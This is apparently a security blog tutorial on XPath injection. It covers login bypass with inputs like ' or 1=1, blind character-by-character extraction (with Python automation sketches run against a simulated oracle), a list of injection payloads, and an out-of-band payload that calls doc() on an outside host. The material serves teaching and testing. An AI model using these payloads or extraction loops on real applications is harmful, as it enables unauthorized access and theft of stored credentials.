XPath Injection

Atharv Sharma
4 min read · Mar 8, 2022

In this post, we will look at one kind of injection attack: XPath injection.

First, what is an XPath injection attack?

An XPath injection attack is similar to SQL injection: the website uses user-supplied information to build an XPath query that runs against XML data. If the website is vulnerable, an attacker can send deliberately malformed input and access data that would normally be out of reach. The attacker can also learn how the XML data is structured.

What is an XML query or XPath?

When an application needs to access XML data, it sends a query written in XPath. XPath is a simple descriptive language that lets a query locate a piece of information in an XML document. It is a standard language, so its syntax is implementation-independent, which means an attack can be automated. Unlike SQL, it has no vendor-specific dialects. XPath also has no access-level permissions: a query can refer to almost any part of an XML document, whereas SQL allows restrictions on databases, tables, or columns.

XPath Injection

Suppose a website stores its user information in XML, and the document below holds the credentials used to authenticate users.

<?xml version="1.0" encoding="utf-8"?>
<Employees>
<Employee ID="1">
<Name>Sam</Name>
<UserName>Johns</UserName>
<Password>This is Secret</Password>
</Employee>
<Employee ID="2">
<Name>Peter</Name>
<UserName>Pan</UserName>
<Password>Pass</Password>
</Employee>
</Employees>

To log in, the user must enter a username and password. The application then builds an XPath query to check the credentials that the user entered. The query will look like this:

"//Employee[UserName/text()='" & Request("UserName") & "' and Password/text()='" & Request("Password") & "']"

Now, if we insert malicious input into the username field, the generated query looks like this:

Username: test' or 1=1 or 'a'='a
Password: test
XPath Query:
//Employee[UserName/text()='test' or 1=1 or 'a'='a' and Password/text()='test']
This is equivalent to:
//Employee[(UserName/text()='test' or 1=1) or ('a'='a' and Password/text()='test')]

Because 1=1 is always true, the predicate is true for every Employee node, no matter what the remaining conditions evaluate to. The password check becomes irrelevant, and the attacker gets unauthorized access to the website.
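The effect of the concatenation can be reproduced in a few lines. The following is a minimal sketch, not the site's actual code: `build_login_query` and `injected_predicate` are hypothetical names, and the predicate is restated in plain Python instead of being run through an XPath engine (Python's `and` also binds tighter than `or`, so the grouping matches).

```python
def build_login_query(username: str, password: str) -> str:
    """Naive string concatenation, mirroring the query template above."""
    return ("//Employee[UserName/text()='" + username
            + "' and Password/text()='" + password + "']")


# The two Employee records from the example, as (UserName, Password) pairs.
EMPLOYEES = [("Johns", "This is Secret"), ("Pan", "Pass")]


def injected_predicate(user_name: str, stored_password: str) -> bool:
    """Python restatement of the injected predicate for one Employee node."""
    return (user_name == "test" or 1 == 1
            or ("a" == "a" and stored_password == "test"))


query = build_login_query("test' or 1=1 or 'a'='a", "test")
print(query)

# Every record satisfies the predicate, so the password is never decisive.
matches = [user for user, pwd in EMPLOYEES if injected_predicate(user, pwd)]
print(matches)
```

The first print shows the same query string as in the example, and the second shows that both stored users match even though neither has the password "test".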

Blind XPath Injection Attack

Blind XPath injection attacks can be used to extract data from an application that embeds user-supplied data in an unsafe way. This attack is used when the attacker does not know the structure of the XML data, or when error messages are suppressed, so the attacker can only pull out one piece of information at a time by asking true/false questions (booleanized queries), much like blind SQL injection.

Blind XPath injection can be mounted using two methods:
1. Booleanization.
2. XML crawling.

Booleanization

With this technique, the attacker learns whether an expression is true or false. Suppose an attacker targets a login form that is vulnerable to blind XPath injection: a successful login signals "True" and a failed login signals "False". Each request targets a small piece of information, such as a single character or number.
When the attacker focuses on a string, they can reveal it in its entirety by checking every character against the class/range of characters the string may contain.

Using the string-length(S) function, where S is a string, the attacker can find out the length of the string. With the appropriate number of substring(S,N,1) calls, where S is the same string, N is the 1-based position of the character to read, and 1 is the number of characters to return, the attacker can enumerate the whole string.

Code:
<?xml version="1.0" encoding="UTF-8"?>
<data>
<user>
<login>admin</login>
<password>test</password>
<realname>SuperUser</realname>
</user>
<user>
<login>Atharv</login>
<password>12345</password>
<realname>Simple User</realname>
</user>
</data>

Function:

  • string-length(//user[position()=1]/child::node()[position()=2]) returns the length of the second child of the first user. For the document above this is the password "test", so the result is 4 (assuming the parser discards whitespace-only text nodes between elements),
  • substring((//user[position()=1]/child::node()[position()=2]),1,1) returns the first character of that value ('t').
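The two functions combine into a simple extraction loop. The sketch below is one possible way to write it, under stated assumptions: `ask` stands for whatever sends an expression to the vulnerable page and reports true or false, and `make_fake_oracle` is a hypothetical local stand-in that answers the two question shapes from a known secret, so the loop can be tried without a real target or an XPath engine.

```python
import re
import string

# Node path taken from the article's example expressions.
TARGET = "//user[position()=1]/child::node()[position()=2]"


def extract_string(ask, target=TARGET, max_len=64,
                   alphabet=string.ascii_letters + string.digits):
    """Recover the string value of `target` using only true/false answers."""
    # Step 1: find the length by asking string-length(S)=n for n = 0, 1, 2, ...
    length = next(n for n in range(max_len + 1)
                  if ask(f"string-length({target})={n}"))
    # Step 2: recover each character with substring(S,N,1)='c' (N is 1-based).
    chars = []
    for pos in range(1, length + 1):
        for ch in alphabet:
            if ask(f"substring(({target}),{pos},1)='{ch}'"):
                chars.append(ch)
                break
        else:
            chars.append("?")  # character outside the tested alphabet
    return "".join(chars)


def make_fake_oracle(secret):
    """Local stand-in for the vulnerable page (an assumption for this demo)."""
    def ask(expr):
        m = re.fullmatch(r"string-length\(.+\)=(\d+)", expr)
        if m:
            return len(secret) == int(m.group(1))
        m = re.fullmatch(r"substring\(\(.+\),(\d+),1\)='(.)'", expr)
        if m:
            pos = int(m.group(1))
            return secret[pos - 1:pos] == m.group(2)
        raise ValueError(f"unsupported expression: {expr}")
    return ask


if __name__ == "__main__":
    print(extract_string(make_fake_oracle("test")))  # prints: test
```

In a real attack, `ask` would wrap each expression in an injection payload and interpret the login result. The linear scan over the alphabet is the simplest choice, not the fastest.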

XML Crawling

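To learn the structure of the XML document, the attacker may use:

  • count(expression)
count(//user/child::node())

This returns the total number of child nodes of all user elements (6 for the document above if whitespace-only text nodes are ignored). To count the user elements themselves, count(//user) returns 2.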

  • string-length(string)
string-length(//user[position()=1]/child::node()[position()=2])=6 

With this query, the attacker learns whether the second child (the password) of the first user node ('admin') is 6 characters long.

  • substring(string, number, number)
substring((//user[position()=1]/child::node()[position()=2]),1,1)="a"

This query will confirm (True) or deny (False) that the first character of the user (‘admin’) password is an “a” character.
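Repeating count() questions at every level is enough to map the shape of a document. The following is a rough sketch of such a crawler, with several assumptions: it uses `*` rather than `child::node()` so that only elements are counted, `ask` is a placeholder for the true/false channel, and `make_fake_oracle` is a hypothetical local simulation built on Python's `xml.etree.ElementTree` that understands only the one expression shape the crawler emits.

```python
import re
import xml.etree.ElementTree as ET


def count_children(ask, path, max_children=50):
    """Return the n for which count(path/*)=n is answered true."""
    for n in range(max_children + 1):
        if ask(f"count({path}/*)={n}"):
            return n
    raise RuntimeError("more children than max_children")


def crawl(ask, path="/*[1]"):
    """Return the element structure under `path` as nested lists."""
    n = count_children(ask, path)
    return [crawl(ask, f"{path}/*[{i}]") for i in range(1, n + 1)]


def make_fake_oracle(xml_text):
    """Local stand-in for the vulnerable page (an assumption for this demo)."""
    root = ET.fromstring(xml_text)

    def ask(expr):
        m = re.fullmatch(r"count\(((?:/\*\[\d+\])+)/\*\)=(\d+)", expr)
        if not m:
            raise ValueError(f"unsupported expression: {expr}")
        steps = [int(i) for i in re.findall(r"\[(\d+)\]", m.group(1))]
        node = root  # steps[0] selects the document element, /*[1]
        for i in steps[1:]:
            node = list(node)[i - 1]
        return len(node) == int(m.group(2))

    return ask


SAMPLE = """<data>
<user><login>admin</login><password>test</password><realname>SuperUser</realname></user>
<user><login>Atharv</login><password>12345</password><realname>Simple User</realname></user>
</data>"""

if __name__ == "__main__":
    # Two users, each with three leaf elements.
    print(crawl(make_fake_oracle(SAMPLE)))
```

Each empty list is a leaf element. Its name and text would then be recovered with the string-length and substring questions described above.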

Suppose the login query is built like this:

C#:

String FindUser;
FindUser = "//user[login/text()='" + Request["Username"] + "' and " +
    "password/text()='" + Request["Password"] + "']";

then the attacker could inject the following input:

Username: ' or substring((//user[position()=1]/child::node()[position()=2]),1,1)="a" or ''='
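To see what the application ends up evaluating, the payload can be substituted into the query template. This is a small illustrative sketch in Python: `build_find_user` mirrors the concatenation shown above, and `boolean_probe` is a hypothetical helper that wraps any true/false condition in the `' or ... or ''='` pattern.

```python
def build_find_user(username: str, password: str) -> str:
    """Same concatenation as the login query above, written in Python."""
    return ("//user[login/text()='" + username
            + "' and password/text()='" + password + "']")


def boolean_probe(condition: str) -> str:
    """Wrap an XPath condition so it can be sent in the Username field."""
    return "' or " + condition + " or ''='"


condition = ('substring((//user[position()=1]/child::node()[position()=2])'
             ',1,1)="a"')
payload = boolean_probe(condition)
print(payload)
print(build_find_user(payload, "x"))
```

In the resulting query the trailing `''=''` is joined to the password test with `and`, so the outcome depends on the injected condition: if it is true, the predicate holds for every user node; if it is false, only a genuinely matching password could make it true.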

The XPath syntax may remind you of common SQL injection attacks, but the attacker must keep in mind that XPath does not allow commenting out the rest of the expression. To work around this limitation, the attacker uses OR expressions to neutralize the remaining conditions, which would otherwise disrupt the attack.

Because of Booleanization, the number of queries, even for a small XML document, may be extremely high (thousands, hundreds of thousands, or more). That is why this attack is not conducted manually. Knowing a few basic XPath functions, an attacker can quickly write an application that rebuilds the structure of the document and fills it with data automatically.
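A back-of-the-envelope count shows how quickly the requests add up. The sketch below assumes the simplest strategy: a linear scan for the length, then every candidate character tried at every position. The alphabet size of 62 (letters and digits) and the figure of 100 strings are illustrative assumptions, not measurements.

```python
def worst_case_requests(length: int, alphabet_size: int) -> int:
    """Upper bound on true/false requests needed to recover one string."""
    length_probes = length + 1             # string-length(S)=0, 1, ..., length
    char_probes = length * alphabet_size   # every candidate at every position
    return length_probes + char_probes


per_string = worst_case_requests(8, 62)
print(per_string)        # 505 requests for one 8-character string
print(100 * per_string)  # 50500 requests for 100 such strings
```

Element names, attribute names, and the count() questions used for crawling add further requests on top of this.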

Payloads for XPath Injection

Query:

"string(//user[name/text()='" +vuln_var1+ "' and password/text()='" +vuln_var1+ "']/account/text())"

Payloads:

' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
search=')] | //user/*[contains(*,'
search=Har') and contains(../password,'c
search=Har') and starts-with(../password,'c

Blind Exploitation:

  • Size of a string
and string-length(account)=SIZE_INT
  • Extract a character
substring(//user[userid=5]/username,2,1)=CHAR_HERE
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)

Out Of Band Exploitation

http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')

Tools for XPath Injection:

References:

  1. OWASP XPath Injection
  2. Payload All Things: XPath Payloads
